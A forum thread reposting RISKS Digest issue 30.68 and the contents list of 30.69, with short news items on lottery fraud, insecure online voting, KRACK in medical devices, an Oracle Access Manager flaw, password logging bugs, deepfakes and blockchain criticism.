Welcome home, fellow Gator.

The Gator Nation's oldest and most active insider community
Join today!

Risks Digest

Discussion in 'Gator Bytes' started by LakeGator, Apr 25, 2015.

  1. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    4,755
    483
    283
    Apr 3, 2007
    Tampa
    Risks Digest 30.68

    RISKS List Owner

    May 5, 2018 8:34 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Saturday 5 May 2018 Volume 30 : Issue 68

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Iowa Lottery fraud resolved (PGN on NYTimes item)
    "Online voting is impossible to secure. So why are some governments
    using it?" (Porup)
    Lightning Struck Her Home. Then Her Brain Implant Stopped Working (NY Times)
    KRACK Wi-Fi vulnerability can expose medical devices, patient records
    (Charlie Osborne)
    "A critical security flaw in popular industrial software put power plants
    at risk" (Zack Whittaker)
    "Oracle Access Manager security bug so serious it let anyone access
    protected data" (Lian Tung)
    How not to announce a loss of secure information (SMH)
    Why Silicon Valley can't fix itself (The Guardian)
    "Google Maps user? Beware attackers using URL-sharing to send
    you to shady sites" (Lian Tung)
    China's bungled drone display breaks world record (via BBC.com)
    When a stranger takes your face, Facebook failed crackdown on fake accounts
    (WashPo)
    The Era of Fake Video Begins (Franklin Foer)
    Souped-up smartphones, robots to help police fight crime more effectively
    (Straits Times)
    "GitHub says bug exposed some plaintext passwords" (ZDNet)
    "Gaming: The System" (NY Times)
    France seizes France.com from man who's had it since 1994, so he sues
    (Ars Technica)
    Transparent Eel-Like Soft Robot Can Swim Silently Underwater (ACM Technews)
    He Drove a Tesla on Autopilot From the Passenger Seat. The Court
    Was Not Amused. (NYTimes)
    Is My Not-So-Smart House Watching Me? (NYTimes)
    Following the Trail of Online Ads, Wherever It Leads (NYTimes)
    Criminals Used Flying Robots to Disrupt FBI Hostage Operation
    (Fortune)
    Facebook's dating service is a chance to meet the catfisher, advertiser,
    or scammer of your dreams (WashPo)
    Blockchain Will Be Theirs, Russian Spy Boasted at Conference
    (Nathaniel Popper)
    Blockchain is not only crappy technology but a bad vision for
    the future (Kai Stinchcombe, John Levine)
    Keeping your *Twitter* account secure (Gabe Goldberg)
    Against Trendism: how to defang the social media disinformation complex
    (Medium via John Ohno)
    Letter to *Consumer Reports* responding to June article about connected cars
    (Gabe Goldberg)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Thu, 3 May 2018 14:06:09 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Iowa Lottery fraud resolved (NYTimes)

    The Iowa Hot Lotto fraud scandal has now been resolved. A programmer who
    happened to be the info-security head for the Multi-State Lottery
    Association managed to slip in a piece of code into the proprietary system
    that changed the randomness on just three chosen days in the year. This
    enabled a would-be payoff of $14.3M. The collaborators were detected when
    they attempted to collect.
    The Man Who Cracked the Lottery

    This is reminiscent of the Harrah's Tahoe six-slot-machine progressive
    payoff noted way back in RISKS-1.01 (where a shill chosen to collect the
    payoff never showed up, because he had a record and feared exposure [perhaps
    he was in a witness-protection program?], and the more recent Breeder's Cup
    off-track pick-six $3M scam (RISKS-22.33,38-40) -- in which bets on the
    first four races were altered by an insider after those races were over, and
    the next races wildcarded to cover all possible horses, but in a system in
    which the bets were never transmitted until after the fourth race (to save
    bandwidth?).

    The combination of proprietary code that cannot be inspected externally and
    the insider being the IT security person should recall the corresponding
    situation with proprietary election systems that can be hacked or rigged by
    insiders. [And then read Gene Wirchenko's next item! PGN]

    ------------------------------

    Date: Thu, 03 May 2018 09:01:31 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Online voting is impossible to secure. So why are some governments
    using it?" (Porup)

    J.M. Porup, CSO, 2 May 2018
    Online voting is impossible to secure. So why are some governments using it?

    If you thought electronic voting machines were insecure, wait until you meet
    online voting.

    selected text:

    A researcher at the University of Melbourne in Australia, Teague has twice
    demonstrated massive security flaws in the online voting systems used in
    state elections in Australia -- including one of the largest deployments of
    online voting ever, the 2015 New South Wales (NSW) state election, with
    280,000 votes cast online.

    The response? Official complaints about her efforts to university
    administrators, and a determination by state election officials to keep
    using online voting, despite ample empirical proof, she says, that these
    systems are not secure.

    While insecure voting machines have received most of the attention since the
    2016 U.S. presidential election, states and municipalities continue to use
    -- even enthusiastically adopt -- web-based online voting, including 31
    states in the U.S., two provinces in Canada, and two states in Australia.
    Wales in the UK is pushing hard for online voting. The country of Estonia
    uses online voting for its national elections.

    Security researchers point out flaws; election officials get angry and
    ignore security issues that threaten the integrity of the voting
    results. Teague's story repeats itself around the world.

    The NSW state election of 2015 was so insecure that one seat in the upper
    house of the state parliament may have been decided by hacked votes. In
    response to the scandal, the electoral commission went to great lengths to
    avoid transparency regarding the security issues Teague and her team
    reported, and only revealed the true nature of the problem under close
    questioning in state parliament a year later.

    Before the election, the state electoral commission told the Australian
    Broadcasting Corporation (ABC) that "People's vote is completely secret...
    It's fully encrypted and safeguarded, it can't be tampered with." Yet it
    took researchers only a few days to identify fatal flaws in the online
    voting web application that could have easily been used to spy on and even
    modify every single vote cast online, and to do so in an undetectable
    manner.

    The NSW electoral commission initially reported after the election that
    there were no anomalies seen while using the online voting platform, but a
    year later, under questioning in state parliament, admitted that there were,
    in fact, significant anomalies reported by voters. More than 600 voters who
    attempted to verify their votes using a rudimentary telephone-based system
    were unable to do so -- a 10 percent failure rate, enough to call into
    question the voting result of the state election. "That to me is the bottom
    line," Teague says. "The really important thing is that we didn't find out
    the truth at the time."

    ------------------------------

    Date: Fri, 04 May 2018 08:12:36 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Lightning Struck Her Home. Then Her Brain Implant Stopped Working
    (NY Times)

    Lightning Struck Her Home. Then Her Brain Implant Stopped Working.

    ------------------------------

    Date: Tue, 01 May 2018 09:38:02 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: KRACK Wi-Fi vulnerability can expose medical devices, patient
    records (Charlie Osborne)

    Charlie Osborne for Zero Day, 1 May 2018
    KRACK Wi-Fi vulnerability can expose medical devices, patient records | ZDNet

    selected text:

    Medical devices produced by Becton, Dickinson and Company (BD) are
    vulnerable to the infamous KRACK bug, potentially exposing patient records.
    Discovered in October, KRACK, which stands for Key Reinstallation Attack,
    exploits a flaw in the Wi-Fi Protected Access II (WPA2) protocol which is
    used to secure modern wireless networks.

    If exploited, KRACK gives threat actors the key required to join wireless
    networks which would otherwise require a password for authentication. Once
    they have joined, they can snoop on network traffic, perform
    Man-in-The-Middle (MiTM) attacks, hijack connections, and potentially send
    out crafted, malicious network packets.

    In a security bulletin, BD said that successful exploit in a select range of
    products could also lead to patient record changes or exfiltration, as well
    as major IT disruptions.

    ------------------------------

    Date: Wed, 02 May 2018 08:59:05 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "A critical security flaw in popular industrial software put power
    plants at risk" (Zack Whittaker)

    Zack Whittaker for Zero Day, 2 May 2018
    The bug in the industrial control software could leave power and
    manufacturing plants exposed. A severe vulnerability in a widely used
    industrial control software could have been used to disrupt and shut down
    power plants and other critical infrastructure.
    Industrial software used to run power plants was easily hackable

    ------------------------------

    Date: Thu, 03 May 2018 09:15:02 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Oracle Access Manager security bug so serious it let anyone
    access protected data" (Lian Tung)

    By Liam Tung | May 3, 2018 -- 12:42 GMT (05:42 PDT) | Topic: Security
    The moral? Don't roll your own crypto, security researcher tells Oracle.
    Oracle Access Manager security bug so serious it let anyone access protected data | ZDNet

    selected text:

    A bug that Oracle recently patched broke the main functionality of Oracle
    Access Manager (OAM), which should only give authorized users access to
    protected enterprise data.

    However, researchers at Austrian security firm SEC-Consult found a flaw in
    OAM's cryptographic format that allowed them to create session tokens for
    any user, which the attacker could use to impersonate any legitimate user
    and access web apps that OAM should be protecting.

    "What's more, the session cookie crafting process lets us create a session
    cookie for an arbitrary username, thus allowing us to impersonate any user
    known to the OAM."

    ------------------------------

    Date: Fri, 4 May 2018 11:08:29 +1000
    From: Dave Horsfall <da...@horsfall.org>
    Subject: How not to announce a loss of secure information (SMH)

    The Commonwealth Bank of Australia, who are in enough trouble as it is with
    major scandals, did not tell its customers that some "tapes" went missing on
    their way to be destroyed.

    Almost 20 million bank account records lost by Commonwealth Bank

    ``The tapes contained customer names, addresses, account numbers and
    transaction details from 19.8 million accounts spanning 2000 to early
    2016. They did not contain passwords, PINs or other data which could be
    used to enable account fraud, CBA said in a statement on Wednesday night
    after BuzzFeed broke the story.''

    So, plenty of account numbers and transaction details etc, but we've got
    nothing to worry about, right? Perhaps they should be reading RISKS...

    Dave Horsfall VK2KFU North Gosford NSW 2250 Australia

    ------------------------------

    Date: Sat, 5 May 2018 11:04:01 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Why Silicon Valley can't fix itself (The Guardian)

    Tech insiders have finally started admitting their mistakes -- but the
    solutions they are offering could just help the big players get even more
    powerful.

    http://www.theguardian.com/news/2018/may/03/why-silicon-valley-cant-fix-itself-tech-humanism

    ------------------------------

    Date: Wed, 02 May 2018 09:02:16 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Google Maps user? Beware attackers using URL-sharing to send
    you to shady sites" (Lian Tung)

    Liam Tung, ZDNet, 2 May 2018

    The Google Maps URL-sharing feature allows scammers to send victims to any
    site they choose. Scammers are using the Google Maps URL-sharing feature to
    direct victims not to Maps but any shady website the crooks want. According
    to security firm Sophos, scammers are taking advantage of the fact the URL
    sharing feature in Google Maps isn't an official product and lacks a
    mechanism to report scammy links.

    That's unlike Google's soon-to-be retired URL shortener goo.gl, which can be
    used to conceal links to malware or phishing sites, but also has a simple
    way for recipients to report scam links.

    Google Maps user? Beware attackers using URL-sharing to send you to shady sites | ZDNet

    ------------------------------

    Date: Thu, 03 May 2018 09:29:21 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: China's bungled drone display breaks world record (via BBC.com)



    Swarm intelligence is complicated to coordinate. "I believe everything
    happens for a reason. Usually, the reason is that somebody screwed up."
    (From Maxine -- the Hallmark Shoebox card character on 23JUN2007).Â

    ------------------------------

    Date: Sat, 05 May 2018 00:54:41 +0000
    From: Richard M Stein <rms...@ieee.org>
    Subject: When a stranger takes your face, Facebook failed crackdown on fake
    accounts (WashPo)

    When a stranger takes your face: Facebook’s failed crackdown on fake accounts

    Perhaps a biometric supplement would boost authentication accuracy?

    Would be good to learn Facebook user profile photo match rate against the
    FBI's NCIC to test hit/miss rate. How many convicted felons or fugitives use
    Facebook? Given this information, update T&Cs to hedge against
    authentication theft.

    ------------------------------

    Date: Sun, 29 Apr 2018 23:41:00 +0000
    From: geoff goodfellow <ge...@iconia.com>
    Subject: The Era of Fake Video Begins (Franklin Foer)

    Franklin Foer, *The Atlantic*, May 2018 Issue
    The digital manipulation of video may make the current era of fake news seem
    quaint.
    The Era of Fake Video Begins

    EXCERPT:

    In a dank corner of the Internet, it is possible to find actresses from Game
    of Thrones or Harry Potter engaged in all manner of sex acts. Or at least to
    the world the carnal figures look like those actresses, and the faces in the
    videos are indeed their own. Everything south of the neck, however, belongs
    to different women. An artificial intelligence has almost seamlessly
    stitched the familiar visages into pornographic scenes, one face swapped for
    another. The genre is one of the cruelest, most invasive forms of identity
    theft invented in the Internet era. At the core of the cruelty is the acuity
    of the technology: A casual observer can't easily detect the hoax.

    This development, which has been the subject of much hand-wringing in the
    tech press, is the work of a programmer who goes by the nom de hack
    *deepfakes*. And it is merely a beta version of a much more ambitious
    project. One of deepfakes' compatriots told Vice's Motherboard site in
    January that he intends to democratize this work. He wants to refine the
    process, further automating it, which would allow anyone to transpose the
    disembodied head of a crush or an ex or a co-worker into an extant
    pornographic clip with just a few simple steps. No technical knowledge would
    be required. And because academic and commercial labs are developing even
    more-sophisticated tools for non-pornographic purposes -- algorithms that
    map facial expressions and mimic voices with precision -- the sordid fakes
    will soon acquire even greater verisimilitude. The Internet has always
    contained the seeds of postmodern hell. Mass manipulation, from clickbait to
    Russian bots to the addictive trickery that governs Facebook's News Feed, is
    the currency of the medium. It has always been a place where identity is
    terrifyingly slippery, where anonymity breeds coarseness and confusion,
    where crooks can filch the very contours of selfhood. In this respect, the
    rise of deepfakes is the culmination of the Internet's history to date --
    and probably only a low-grade version of what's to come.

    ------------------------------

    Date: Thu, 03 May 2018 17:19:08 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Souped-up smartphones, robots to help police fight crime more
    effectively (Straits Times)

    http://www.straitstimes.com/singapo...s-to-help-police-fight-crime-more-effectively

    "New technology unveiled on Thursday (May 3) will make it easier for the
    police to fight crime and enforce the law.

    "Souped-up smartphones will allow officers to respond faster and more
    effectively to incidents, as well as call up key information on a
    case. Robots on patrol can aid in the detection of suspicious activities,
    and handheld scanners will make it easier to take real- time 3D scans of
    crime scenes to aid in crime solving."

    The article has several photos (showing 3 unique autonomous patrol unit
    configurations) and lists the autonomous patrol unit's h/w specification.

    ------------------------------

    Date: Wed, 02 May 2018 08:55:33 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "GitHub says bug exposed some plaintext passwords" (ZDNet)

    http://www.zdnet.com/article/github-says-bug-exposed-account-passwords/

    Zack Whittaker for Zero Day, 1 May 2018
    A small but unspecified number of GitHub staff could have seen plaintext
    passwords. GitHub has said a bug exposed some user passwords -- in
    plaintext.

    ------------------------------

    Date: Mon, 30 Apr 2018 09:57:26 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: "Gaming: The System" (NY Times)

    https://www.nytimes.com/2018/04/28/opinion/sunday/gaming-the-system.htm

    ``My gamified life may be nutty and sad, but it doesn't hurt anyone. At
    least that's what I thought until a few months ago, when my new car
    insurance company, Liberty Mutual, invited me to join a program its
    website describes this way: Using a small device that observes your
    driving habits, we'll notice the safe choices you're making on the road
    and reward you for them. The company promised a rate reduction of at
    least 5 percent and up to 30 percent, based on driving performance over a
    three-month period. Best of all, an app would let me track the size of my
    discount in real time.''

    Technology gamifies our lives as consumers -- a dopamine burst sustains
    product interest boosted by a loyalty discount, while data capture
    algorithms gleefully score your profile. Several economics Nobel prizes
    attest to reward incentive influence on consumer behavior. Is gamification
    deployed by social media bots that promote political candidates? Is
    gamification deployed by industries opposing environmental or health
    legislation? Has gamification emerged as a new public health threat
    exploiting the brain's addiction channel?

    See RISKS-29.21 for the first mention of 'gamification' in comp.risks: "The
    brain-imaging experiment showed how the students concentrated and learned
    better when studying was part of a game."

    ------------------------------

    Date: Mon, 30 Apr 2018 00:38:06 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: France seizes France.com from man who's had it since 1994, so he sues
    (Ars Technica)

    http://arstechnica.com/tech-policy/...com-from-man-whos-had-it-since-94-so-he-sues/

    Nice domain you have there. Would be a shame if anything happened to it...

    ------------------------------

    Date: Wed, 2 May 2018 12:31:36 -0400
    From: ACM TechNews <technew...@acm.org>
    Subject: Transparent Eel-Like Soft Robot Can Swim Silently Underwater

    University of California, San Diego (04/24/18) Ioana Patringenaru
    via ACM TechNews, Wednesday, 2 May 2018

    Researchers at the University of California, San Diego and the University of
    California, Berkeley have created a nearly-transparent eel-like robot that
    can swim silently in salt water using artificial muscles. Critical to the
    new technology is the use of the salt water in which the robot swims, to
    generate the electrical forces that propel it. The robot delivers negative
    charges to the water just outside itself, and positive charges inside the
    robot to trigger its muscles to bend, creating the robot's swimming motion.
    The charges carry very little current, making them safe for marine life. The
    technology is an important step toward a future when soft robots can swim in
    the ocean alongside fish and invertebrates without harming them, the
    researchers say.

    http://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-1b1b0x215c58x070332&

    [The technology is fascinating, with lots of opportunities here. Risks?
    Sharks might devour but not digest the robots, heat-sensing creatures
    might cuddle up to them, or even befriend them, or redirect robots that
    are stealthy torpedos to another target! PGN]

    ------------------------------

    Date: Sun, 29 Apr 2018 17:31:40 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: He Drove a Tesla on Autopilot From the Passenger Seat. The Court
    Was Not Amused. (NYTimes)

    http://www.nytimes.com/2018/04/29/world/europe/uk-autopilot-driver-no-hands.html

    The British man was barred from driving for 18 months after being videotaped
    sitting with his hands behind his head, cruising at 40 miles per hour in
    *heavy* traffic.

    ------------------------------

    Date: Sun, 29 Apr 2018 17:32:05 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Is My Not-So-Smart House Watching Me? (NYTimes)

    http://www.nytimes.com/2018/04/27/realestate/is-my-not-so-smart-house-watching-me.html

    Smart-house technology has made it easier to turn on the lights and set the
    thermostat, but sometimes objects go rogue.

    ------------------------------

    Date: Sun, 29 Apr 2018 17:32:55 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Following the Trail of Online Ads, Wherever It Leads (NYTimes)

    http://www.nytimes.com/2018/04/18/technology/personaltech/online-advertising-tracking.html

    Sapna Maheshwari, who covers advertising for The Times, discusses how she
    tracks the online ads that track us.

    ------------------------------

    Date: Fri, 4 May 2018 23:50:14 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Criminals Used Flying Robots to Disrupt FBI Hostage Operation
    (Fortune)

    Criminals have discovered another use for drones -- to distract and spy on
    law enforcement.

    They recently tried to thwart an FBI hostage rescue, Joe Mazel, chief of the
    FBI's operational technology law unit, said this week, according to a report
    by news site Defense One.

    Mazel, speaking at the AUVSI Xponential drone conference in Denver, said
    that criminals launched a swarm of drones at an FBI rescue team during an
    unspecified hostage situation near a large U.S. city, confusing law
    enforcement. The criminals flew the drones at high speed over the heads of
    FBI agents to drive them away while also shooting video that they then
    uploaded to YouTube as a way to alert other nearby criminal members about
    law enforcement's location.

    http://fortune.com/2018/05/04/drone-fbi-hostage-criminals/

    ------------------------------

    Date: Thu, 3 May 2018 19:44:28 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Facebook's dating service is a chance to meet the catfisher,
    advertiser, or scammer of your dreams (WashPo)

    via NNSquad

    http://www.washingtonpost.com/news/...tfisher-advertiser-or-scammer-of-your-dreams/

    The love-seeking singles of Facebook's new dating service, privacy experts
    say, may not be prepared for what they'll encounter: sham profiles,
    expanded data gathering and a new wave of dating fraud. Facebook -- under
    fire for viral misinformation, fake accounts and breaches of tr[sic]

    ------------------------------

    Date: Sun, 29 Apr 2018 17:02:35 -1000
    From: geoff goodfellow <ge...@iconia.com>
    Subject: Blockchain Will Be Theirs, Russian Spy Boasted at Conference
    (Nathaniel Popper)

    Nathaniel Popper, The New York Times, 29 Apr 2018

    http://www.nytimes.com/2018/04/29/technology/blockchain-iso-russian-spies.html

    EXCERPT:

    Russian interest in the technology surrounding virtual currencies, like in
    this crypto-mining operation in Moscow, is growing. Last year, employees of
    Russia's spy agency attended a meeting where international standards for the
    so-called blockchain were discussed. Andrey Rudakov/Bloomberg

    SAN FRANCISCO -- Last year, representatives of 25 countries met in Tokyo to
    work on setting international standards for the blockchain, the technology
    that was introduced by the virtual currency Bitcoin and has ignited intense
    interest in corporate and government circles.

    Some of the technologists at the meeting of the International Standards
    Organization were surprised when they learned that the head of the Russian
    delegation, Grigory Marshalko, worked for the FSB, the intelligence agency
    that is the successor to the KGB.

    They were even more surprised when they asked the FSB agent why the Russians
    were devoting such resources to the blockchain standards.

    ``Look, the Internet belongs to the Americans -- but blockchain will belong
    to us,'' he said, according to one delegate who was there. The Russian added
    that two other members of his country's four-person delegation to the
    conference also worked for the FSB.

    Another delegate who had a separate conversation with the head of the
    Russian group remembers a slightly different wording: ``The Internet
    belonged to America. The blockchain will belong to the Russians.''

    Both of the delegates who recounted their conversations did so on the
    condition of anonymity, because discussions at the International Standards
    Organization are supposed to be confidential. Neither the Russian
    organizations overseeing the delegation to the ISO nor the Russian delegates
    responded to requests for comment.

    ------------------------------

    Date: Sat, 5 May 2018 09:22:23 -0400
    From: "Dave Farber" <far...@gmail.com>
    Subject: Blockchain is not only crappy technology but a bad vision for
    the future (Kai Stinchcombe)

    Kai Stinchcombe, Medium, 5 Apr 2018 [Via Dave's IP distribution]


    Blockchain is not only crappy technology but a bad vision for the future.
    Its failure to achieve adoption to date is because systems built on trust,
    norms, and institutions inherently function better than the type of
    no-need-for-trusted-parties systems blockchain envisions. That's permanent:
    no matter how much blockchain improves it is still headed in the wrong
    direction.

    This December I wrote a widely-circulated article on the inapplicability of
    blockchain to any actual problem. People objected mostly not to the
    technology argument, but rather hoped that decentralization could produce
    integrity. [...]

    ------------------------------

    Date: May 5, 2018 at 1:49:22 PM EDT
    From: "John Levine" <jo...@iecc.com>
    Subject: Blockchain is not only crappy technology but a bad vision for
    the future (Re: Stinchcombe)
    Well, gee, everything he says is self-evidently true.

    Bitcoins remind me of a story from the late chair of the Princeton U.
    astronomy department. In 1950 Immanuel Velikovsky published "Worlds in
    Collision", a controversial best selling book that claimed that 3500 years
    ago Venus and Mars swooped near the earth, causing `catastrophes that were
    passed down in religions and mythologies.

    The astronomer was talking to an anthropologist at a party and the book came
    up.

    "The astronomy is nonsense," said the astronomer, "but the anthropology is
    really interesting."

    "Funny," replied the anthropologist, "I was going to say almost the same
    thing."

    Bitcoin and blockchains lash together an unusual distributed database with a
    libertarian economic model. People who understand databases realize that
    blockchains only work as long as there are incentives to keep a sufficient
    number of non-colluding miners active, preventing collusion is probably
    impossible, and that scaling blockchains up to handle an interesting
    transaction rate is very hard, but that no-government money is really
    interesting.

    People who understand economics and particularly economic history understand
    why central banks manage their currencies, thin markets like the ones for
    cryptocurrencies are easy to corrupt, and a payment system nees a way to
    undo bogus payments, but that free permanent database ledger is really
    interesting.

    Not surprisingly, the most enthusiastic bitcoin and blockchain proponents
    are the ones who understand neither databases nor economics.

    ------------------------------

    Date: Thu, 3 May 2018 22:56:28 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Keeping your *Twitter* account secure

    Or not.

    http://blog.twitter.com/official/en_us/topics/company/2018/keeping-your-account-secure.html

    When you set a password for your Twitter account, we use technology that
    masks it so no one at the company can see it. We recently identified a bug
    that stored passwords unmasked in an internal log. We have fixed the bug,
    and our investigation shows no indication of breach or misuse by anyone.

    ------------------------------

    Date: Fri, 04 May 2018 14:15:59 +0000
    From: John Ohno <john...@gmail.com>
    Subject: Against Trendism: how to defang the social media disinformation
    complex (Medium)



    There's an essential mistake that almost every social media platform makes
    -- one inherited from marketing (where it makes some sense), and one that is
    mostly unexamined and unaccounted-for even in otherwise fairly
    socially-conscious projects like Mastodon and Diaspora. In almost every one
    of these systems, incentives exist that confuse popularity with value.

    I call this *trendism* -- the belief that an already-trending topic deserves
    to be promoted.

    In marketing, because the piece of information being spread is intended to
    sell a product, the spread of that information is, in fact, theoretically
    proportional to its value. In social media, the information being spread is
    not a piece of advertising, and while most of these systems have revenue
    models based on advertising, that advertising is generated on the fly based
    on the viewer's browsing history and has nothing to do with the content of
    the piece of information being spread.

    The thing is, ideas travel in packs. When we encounter one idea, we tend to
    see its nearest neighbours also. When we find out something new, our friends
    hear about it too. So, trending posts are rarely surprising: by the very
    nature of their popularity, they are already familiar in their essence to
    most of the people who are directed toward them.

    The information content of a message, in Claude Shannon's formulation, is
    proportional to its deviation from expectation -- information is surprise.
    Kolgorov's [Kolmogorov? PGN] formulation is similar: information content
    proportional to the smallest possible message that could say the same thing
    (which, of course, includes references to earlier messages or prior
    knowledge as a possible tactic).

    In other words, from an information-theoretic perspective, a post that only
    tells you things you already know is worthless. Yet, trending content is
    almost always composed solely of things the viewer has already seen.

    There's one piece of information that a copy of a viral post actually has --
    the association between the content of the post and the person posting it.
    We share posts we've already seen as a way of expressing our identity, both
    personally and within a group. That is the only form of information valued
    by trending-oriented systems: tribal affiliation.

    If we want to force our social media platforms into information-rich
    environments and lower the amount of tribal rivalry we are exposed to, there
    are a couple general-purpose solutions, and they all come down to
    kneecapping the machinery of trendism.

    1. Rather than block political content (only one kind of tribalist
    content, and one that is at least theoretically grounded in genuine
    philosophical differences about the ideal shape of the world, rather than
    geography or social groups), we should block all shared content. Remove
    retweets and shares from your feed entirely. Most of them are things you
    have already seen, and most of the rest don't contain meaningful or useful
    information.

    2. Emotionally-manipulative posts get the most engagement, and are
    therefore ranked higher in feeds. (I don't want to be emotionally
    manipulated. Do you?)* To defeat this ranking, force your feed to
    reverse-chronological order. To filter out emotionally-manipulative posts,
    filter out anything with more than a set number of interactions.

    3. Avoid being part of the problem. Before sharing, determine: is the
    information true? Is it new? Is it playing mostly on my emotions? If
    possible, delay your sharing for a long period of time -- read an article,
    and then wait a few hours, or even a few days, before deciding whether or
    not it is of sufficient quality to actually re-post.

    4. Identify when you are being drawn into heated arguments, and ignore
    them. In the heat of the moment, you're not actually making good points
    anyhow, and you're more likely to misunderstand or misrepresent your
    opponent. The suggestions from #3 apply here too for comments -- make sure
    your comments are accurate, informative, and cool, even if that means
    waiting several days to respond. Never let the system rush you.

    5. Visible metrics gamify trendism. Remove them.

    Most social media platforms don't make it easy to follow this advice.
    Mastodon is closest -- it hides metrics from the timeline by default,
    supports only reverse-chronological post ordering, and allows you to filter
    all boosts from your timeline. For everything else, you will need to use
    browser extensions.

    Facebook Demetricator ... and Twitter Demetricator [...]
    [Truncated for RISKS. PGN]

    ------------------------------

    Date: Sat, 5 May 2018 10:58:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Letter to *Consumer Reports* responding to June article about
    connected cars.

    Your otherwise-excellent article on data-hoovering connected cars doesn't
    mention the downside of manufacturers being able to update automobile
    software: risking bad updates and (worse) hackers abusing update
    mechanisms. Anyone who's endured PC/phone/tablet problems with vendor
    patches -- even had devices "bricked" (made useless) -- should be terrified
    of car updates made without owner permission. And everyone aware of today's
    hacking environment should refuse to purchase anything without understanding
    and consenting to its update mechanism.

    ------------------------------

    Date: Tue, 10 Jan 2017 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.68
    ************************
     
  2. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    4,755
    483
    283
    Apr 3, 2007
    Tampa
    Risks Digest 30.69

    RISKS List Owner

    May 16, 2018 8:35 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Wednesday 16 May 2018 Volume 30 : Issue 69

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    America continues to ignore the risks of election hacking
    (The New Yorker)
    Russia Tried to Undermine Confidence in Voting Systems, Senators Say
    (NYTimes)
    Virginia election officials assigned 26 voters to the wrong district
    (WashPo)
    Securing Elections (Bruce Schneier)
    Australian Emergency Calls Fail due to lightning strike (ABC AU)
    Self-driving cars' shortcomings revealed in DMV reports (Merc)
    VW bugs: "Unpatchable" remote code pwnage (TechBeacon)
    Software bug led to death in Uber's self-driving crash (Ars Technica)
    Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)
    The risk from robot weapons (via The Statesman/Asia News Network,
    published in The Straits Times)
    Is technology bringing history to life or distorting it? (WashPo)
    2,000 wrongly matched with possible criminals at Champions League
    (BBC AU)
    KRACK Wi-Fi vulnerability can expose medical devices, patient
    records (Osborne, R 30 68)
    Nigerian Email Scammers Are More Effective Than Ever (WiReD)
    Dark code (DW)
    Postmortem of Fortnite Service Outage (Epic Games)
    Collateral damage (538)
    Dozens of security cameras hacked in Japan (Mainichi)
    Technology turns our cities into spies for ICE, whether we like it or not
    (LATimes)
    The Digital Vigilantes Who Hack Back (The New Yorker)
    Bring in the Nerds: EFF Introduces Actual Encryption Experts to U.S. Senate
